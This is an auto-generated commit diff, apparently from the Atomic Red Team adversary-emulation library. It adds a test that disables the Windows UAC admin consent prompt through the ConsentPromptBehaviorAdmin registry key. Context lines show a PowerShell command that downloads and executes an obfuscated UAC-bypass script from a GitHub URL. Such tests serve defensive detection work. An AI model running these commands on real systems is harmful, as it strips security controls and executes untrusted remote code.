Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/Indexes-CSV/index.csv

@@ -52,6 +52,7 @@ defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Access
 defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Access Control,19,WinPwn - UAC Bypass ccmstp technique,f3c145f9-3c8d-422c-bd99-296a17a8f567,powershell
 defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Access Control,20,WinPwn - UAC Bypass DiskCleanup technique,1ed67900-66cd-4b09-b546-2a0ef4431a0c,powershell
 defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Access Control,21,WinPwn - UAC Bypass DccwBypassUAC technique,2b61977b-ae2d-4ae4-89cb-5c36c89586be,powershell
+defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Access Control,22,Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key,251c5936-569f-42f4-9ac2-87a173b9e9b8,powershell
 defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
 defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
 defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
@@ -468,6 +469,7 @@ privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Ac
 privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Access Control,19,WinPwn - UAC Bypass ccmstp technique,f3c145f9-3c8d-422c-bd99-296a17a8f567,powershell
 privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Access Control,20,WinPwn - UAC Bypass DiskCleanup technique,1ed67900-66cd-4b09-b546-2a0ef4431a0c,powershell
 privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Access Control,21,WinPwn - UAC Bypass DccwBypassUAC technique,2b61977b-ae2d-4ae4-89cb-5c36c89586be,powershell
+privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Access Control,22,Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key,251c5936-569f-42f4-9ac2-87a173b9e9b8,powershell
 privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
 privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
 privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -35,6 +35,7 @@ defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Access
 defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Access Control,19,WinPwn - UAC Bypass ccmstp technique,f3c145f9-3c8d-422c-bd99-296a17a8f567,powershell
 defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Access Control,20,WinPwn - UAC Bypass DiskCleanup technique,1ed67900-66cd-4b09-b546-2a0ef4431a0c,powershell
 defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Access Control,21,WinPwn - UAC Bypass DccwBypassUAC technique,2b61977b-ae2d-4ae4-89cb-5c36c89586be,powershell
+defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Access Control,22,Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key,251c5936-569f-42f4-9ac2-87a173b9e9b8,powershell
 defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,2,Masquerade as a built-in system executable,35eb8d16-9820-4423-a2a1-90c4f5edd9ca,powershell
@@ -352,6 +353,7 @@ privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Ac
 privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Access Control,19,WinPwn - UAC Bypass ccmstp technique,f3c145f9-3c8d-422c-bd99-296a17a8f567,powershell
 privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Access Control,20,WinPwn - UAC Bypass DiskCleanup technique,1ed67900-66cd-4b09-b546-2a0ef4431a0c,powershell
 privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Access Control,21,WinPwn - UAC Bypass DccwBypassUAC technique,2b61977b-ae2d-4ae4-89cb-5c36c89586be,powershell
+privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Access Control,22,Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key,251c5936-569f-42f4-9ac2-87a173b9e9b8,powershell
 privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 privilege-escalation,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -70,6 +70,7 @@
   - Atomic Test #19: WinPwn - UAC Bypass ccmstp technique [windows]
   - Atomic Test #20: WinPwn - UAC Bypass DiskCleanup technique [windows]
   - Atomic Test #21: WinPwn - UAC Bypass DccwBypassUAC technique [windows]
+  - Atomic Test #22: Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key [windows]
 - T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
   - Atomic Test #1: Sudo usage [macos, linux]
@@ -699,6 +700,7 @@
   - Atomic Test #19: WinPwn - UAC Bypass ccmstp technique [windows]
   - Atomic Test #20: WinPwn - UAC Bypass DiskCleanup technique [windows]
   - Atomic Test #21: WinPwn - UAC Bypass DccwBypassUAC technique [windows]
+  - Atomic Test #22: Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key [windows]
 - [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
   - Atomic Test #1: Sudo usage [macos, linux]
   - Atomic Test #2: Unlimited sudo cache timeout [macos, linux]

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -48,6 +48,7 @@
   - Atomic Test #19: WinPwn - UAC Bypass ccmstp technique [windows]
   - Atomic Test #20: WinPwn - UAC Bypass DiskCleanup technique [windows]
   - Atomic Test #21: WinPwn - UAC Bypass DccwBypassUAC technique [windows]
+  - Atomic Test #22: Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key [windows]
 - T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
@@ -529,6 +530,7 @@
   - Atomic Test #19: WinPwn - UAC Bypass ccmstp technique [windows]
   - Atomic Test #20: WinPwn - UAC Bypass DiskCleanup technique [windows]
   - Atomic Test #21: WinPwn - UAC Bypass DccwBypassUAC technique [windows]
+  - Atomic Test #22: Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key [windows]
 - [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
   - Atomic Test #1: Service Registry Permissions Weakness [windows]
   - Atomic Test #2: Service ImagePath Change with reg.exe [windows]

atomics/Indexes/index.yaml

@@ -2062,9 +2062,10 @@ defense-evasion:
     atomic_tests:
     - name: Bypass UAC using Event Viewer (cmd)
       auto_generated_guid: 5073adf8-9a50-4bd9-b298-a9bd2ead8af9
-      description: |
-        Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
-        Upon execution command prompt should be launched with administrative privelages
+      description: "Bypasses User Account Control using Event Viewer and a relevant
+        Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\nUpon
+        execution command prompt should be launched with administrative privileges.
+        \n"
       supported_platforms:
       - windows
       input_arguments:
@@ -2084,7 +2085,7 @@ defense-evasion:
       auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b
       description: |
         PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
-        Upon execution command prompt should be launched with administrative privelages
+        Upon execution command prompt should be launched with administrative privalages
       supported_platforms:
       - windows
       input_arguments:
@@ -2586,6 +2587,26 @@ defense-evasion:
       executor:
         command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/dccuac.ps1')
         name: powershell
+    - name: Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry
+        key
+      auto_generated_guid: 251c5936-569f-42f4-9ac2-87a173b9e9b8
+      description: "Disable User Account Conrol (UAC) for admin by modifying the registry
+        key \nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin
+        to 0.\n\n[MedusaLocker Ransomware](https://cloudsek.com/technical-analysis-of-medusalocker-ransomware/),
+        \n[Purple Fox Rootkit](https://blogs.blackberry.com/en/2022/01/threat-thursday-purple-fox-rootkit),
+        \n[Avaddon Ransomware](https://blogs.blackberry.com/en/2021/06/threat-thursday-avaddon-ransomware-uses-ddos-attacks-as-triple-threat)\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $orgValue =(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin).ConsentPromptBehaviorAdmin
+          Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0 -Type Dword -Force
+        cleanup_command: 'Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
+          -Name ConsentPromptBehaviorAdmin -Value $orgValue -Type Dword -Force
+
+          '
+        name: powershell
+        elevation_required: true
   T1099:
     technique:
       x_mitre_platforms:
@@ -28434,9 +28455,10 @@ privilege-escalation:
     atomic_tests:
     - name: Bypass UAC using Event Viewer (cmd)
       auto_generated_guid: 5073adf8-9a50-4bd9-b298-a9bd2ead8af9
-      description: |
-        Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
-        Upon execution command prompt should be launched with administrative privelages
+      description: "Bypasses User Account Control using Event Viewer and a relevant
+        Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\nUpon
+        execution command prompt should be launched with administrative privileges.
+        \n"
       supported_platforms:
       - windows
       input_arguments:
@@ -28456,7 +28478,7 @@ privilege-escalation:
       auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b
       description: |
         PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
-        Upon execution command prompt should be launched with administrative privelages
+        Upon execution command prompt should be launched with administrative privalages
       supported_platforms:
       - windows
       input_arguments:
@@ -28958,6 +28980,26 @@ privilege-escalation:
       executor:
         command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/dccuac.ps1')
         name: powershell
+    - name: Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry
+        key
+      auto_generated_guid: 251c5936-569f-42f4-9ac2-87a173b9e9b8
+      description: "Disable User Account Conrol (UAC) for admin by modifying the registry
+        key \nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin
+        to 0.\n\n[MedusaLocker Ransomware](https://cloudsek.com/technical-analysis-of-medusalocker-ransomware/),
+        \n[Purple Fox Rootkit](https://blogs.blackberry.com/en/2022/01/threat-thursday-purple-fox-rootkit),
+        \n[Avaddon Ransomware](https://blogs.blackberry.com/en/2021/06/threat-thursday-avaddon-ransomware-uses-ddos-attacks-as-triple-threat)\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $orgValue =(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin).ConsentPromptBehaviorAdmin
+          Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0 -Type Dword -Force
+        cleanup_command: 'Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
+          -Name ConsentPromptBehaviorAdmin -Value $orgValue -Type Dword -Force
+
+          '
+        name: powershell
+        elevation_required: true
   T1548.003:
     technique:
       x_mitre_platforms:

atomics/T1548.002/T1548.002.md

@@ -54,12 +54,14 @@ Another bypass is possible through some lateral movement techniques if credentia
 
 - [Atomic Test #21 - WinPwn - UAC Bypass DccwBypassUAC technique](#atomic-test-21---winpwn---uac-bypass-dccwbypassuac-technique)
 
+- [Atomic Test #22 - Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key](#atomic-test-22---disable-uac-admin-consent-prompt-via-consentpromptbehavioradmin-registry-key)
+
 
 <br/>
 
 ## Atomic Test #1 - Bypass UAC using Event Viewer (cmd)
 Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
-Upon execution command prompt should be launched with administrative privelages
+Upon execution command prompt should be launched with administrative privileges.
 
 **Supported Platforms:** Windows
 
@@ -98,7 +100,7 @@ reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1
 
 ## Atomic Test #2 - Bypass UAC using Event Viewer (PowerShell)
 PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
-Upon execution command prompt should be launched with administrative privelages
+Upon execution command prompt should be launched with administrative privalages
 
 **Supported Platforms:** Windows
 
@@ -1093,4 +1095,42 @@ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #22 - Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
+Disable User Account Conrol (UAC) for admin by modifying the registry key 
+HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin to 0.
+
+[MedusaLocker Ransomware](https://cloudsek.com/technical-analysis-of-medusalocker-ransomware/), 
+[Purple Fox Rootkit](https://blogs.blackberry.com/en/2022/01/threat-thursday-purple-fox-rootkit), 
+[Avaddon Ransomware](https://blogs.blackberry.com/en/2021/06/threat-thursday-avaddon-ransomware-uses-ddos-attacks-as-triple-threat)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 251c5936-569f-42f4-9ac2-87a173b9e9b8
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+$orgValue =(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin).ConsentPromptBehaviorAdmin
+Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0 -Type Dword -Force
+```
+
+#### Cleanup Commands:
+```powershell
+Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value $orgValue -Type Dword -Force
+```
+
+
+
+
+
 <br/>